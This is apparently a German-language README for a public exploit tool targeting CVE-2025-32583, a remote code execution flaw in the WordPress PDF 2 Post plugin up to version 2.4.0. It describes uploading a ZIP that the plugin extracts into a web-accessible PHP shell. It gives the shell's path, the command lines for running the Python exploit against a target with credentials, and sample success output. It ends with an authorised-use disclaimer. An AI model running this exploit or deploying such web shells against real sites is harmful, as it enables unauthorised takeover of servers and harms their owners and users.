
Das WordPress-PDF-2-Post-Plugin <= 2.4.0 ist anfällig für Remote Code Execution (RCE) +Subscriber
KRITISCHE Schwachstelle
CVE-ID: CVE-2025-32583
Schweregrad: 9.9 (KRITISCH)
CVSS-Vektor:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Eine Schwachstelle im PDF 2 Post WordPress-Plugin (entwickelt von termel) ermöglicht Remote Code Inclusion (RCE) aufgrund einer unzureichenden Kontrolle der Codegenerierung.
Betroffene Versionen: <= 2.4.0
Der Fehler erlaubt es authentifizierten Benutzern (sogar Benutzern mit geringen Rechten), eine .zip-Datei mit PHP-Code hochzuladen. Nach der Extraktion durch das Plugin kann die schädliche PHP-Datei über ein öffentlich zugängliches Uploads-Verzeichnis remote ausgeführt werden.
Nxploited.zipnonce-TokenSobald die Payload hochgeladen wurde, wird die PHP-Shell in den WordPress-Uploads-Ordner extrahiert.
🛠️ Standardpfad:
/wp-content/uploads/YYYY/MM/nxploited.php
Wenn der Exploit beispielsweise im Mai 2025 ausgeführt wird, lautet die URL:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 WordPress organisiert Uploads automatisch nach Jahr/Monat. Stelle daher sicher, dass du den richtigen Ordner anhand des aktuellen Datums prüfst.
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests gedacht.
Jeglicher Missbrauch dieses Codes für nicht autorisierte Aktivitäten ist strengstens untersagt.
Der Autor übernimmt keinerlei Haftung für Schäden oder Missbrauch.
Von: Khaled_alenazi (Nxploited)